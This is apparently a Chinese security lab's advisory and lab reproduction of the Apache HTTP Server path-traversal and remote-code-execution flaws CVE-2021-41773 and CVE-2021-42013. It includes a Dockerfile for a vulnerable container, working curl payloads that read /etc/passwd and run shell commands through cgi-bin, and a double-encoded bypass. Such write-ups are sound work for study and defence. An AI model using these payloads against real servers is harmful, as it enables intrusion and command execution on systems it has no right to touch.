【漏洞资讯】CVE-2021-42013 Remote code execution in Apache HTTP Server

漏洞时间:2021年10月8日

漏洞介绍

Apache HTTP Server 2.4.50 中对 CVE-2021-41773 的修复不够充分。

2021 年 10 月 7 日,Apache 软件基金会发布了Apache HTTP Server 2.4.51 版,以解决 Apache HTTP Server 2.4.49 和 2.4 中的路径遍历和远程代码执行漏洞(CVE-2021-41773、CVE-2021-42013)。这些漏洞已被广泛利用。

漏洞名称
Remote code execution in Apache HTTP Server
威胁等级
high
漏洞威胁
Apache HTTP Server
影响范围
此问题仅影响 Apache 2.4.49 和 Apache 2.4.50,而不影响更早版本。
漏洞类型
目录遍历、RCE
利用难度
N/A
漏洞编号
CVE-2021-42013
是否有POC
存在

 

信息详情

Apache HTTP Server 2.4.50 中对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则可以允许远程代码执行。此问题仅影响 Apache 2.4.49 和 Apache 2.4.50,而不影响更早版本。

Apache CVE-2021-41773 复现

漏洞影响版本2.4.49

漏洞需要条件

1.Apache 2.4.49 版本

2.穿越目录运行被访问。比如配置了<Directory />Require all granted</Directory>

环境搭建

Dockerfile

FROM vulhub/httpd:2.4.49

LABEL maintainer="phithon <root@leavesongs.com>"

RUN set -ex \
    && sed -i "s|#LoadModule cgid_module modules/mod_cgid.so|LoadModule cgid_module modules/mod_cgid.so|g" /usr/local/apache2/conf/httpd.conf \
    && sed -i "s|#LoadModule cgi_module modules/mod_cgi.so|LoadModule cgi_module modules/mod_cgi.so|g" /usr/local/apache2/conf/httpd.conf \
    && cat /usr/local/apache2/conf/httpd.conf \
        | tr '\n' '\r' \
        | perl -pe 's|<Directory />.*?</Directory>|<Directory />\n    AllowOverride none\n    Require all granted\n</Directory>|isg' \
        | tr '\r' '\n' \
        | tee /tmp/httpd.conf \
    && mv /tmp/httpd.conf /usr/local/apache2/conf/httpd.conf

然后修改配置文件。找到httpd.conf

可能会没有vi 这个命令。参考https://blog.csdn.net/weixin_44388689/article/details/113727901

进入容器修改

docker exec -it 459a59702f69 /bin/bash

删除这段

<Directory />
    AllowOverride none
    Require all denied
</Directory>

修改成

	<Directory />
		Require all granted
	</Directory>

然后重启容器。

进行测试

【漏洞资讯】CVE-2021-42013 Remote code execution in Apache HTTP Server

curl -v  –path-as-is  http://localhost:7006/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

Rce的测试环境:

https://github.com/blasty/CVE-2021-41773

Remote Code Execution

$ curl -s --path-as-is -d 'echo Content-Type: text/plain; echo; id' "http://localhost:7006/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh"

uid=33(www-data) gid=33(www-data) groups=33(www-data)

CVE-2021-42013 EXP

CVE-2021-41773 绕过,/cgi-bin/.%2e/%2e%2e/%2e%2e 对2e 二次编码 /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/xxxx

修复方式

升级补丁

参考链接

https://www.cybersecurity-help.cz/vdb/SB2021100718

https://us-cert.cisa.gov/ncas/current-activity/2021/10/07/apache-releases-http-server-version-2451-address-vulnerabilities

https://twitter.com/USCERT_gov/status/1446208533356236805

https://downloads.apache.org/httpd/CHANGES_2.4

https://github.com/andrea-mattioli/apache-exploit-CVE-2021-42013

本文原创,作者:Galaxy,其版权均为Galaxy Lab所有。如需转载,请注明出处:http://galaxylab.pingan.com.cn/%e3%80%90%e6%bc%8f%e6%b4%9e%e8%b5%84%e8%ae%af%e3%80%91cve-2021-42013-remote-code-execution-in-apache-http-server/

发表评论

*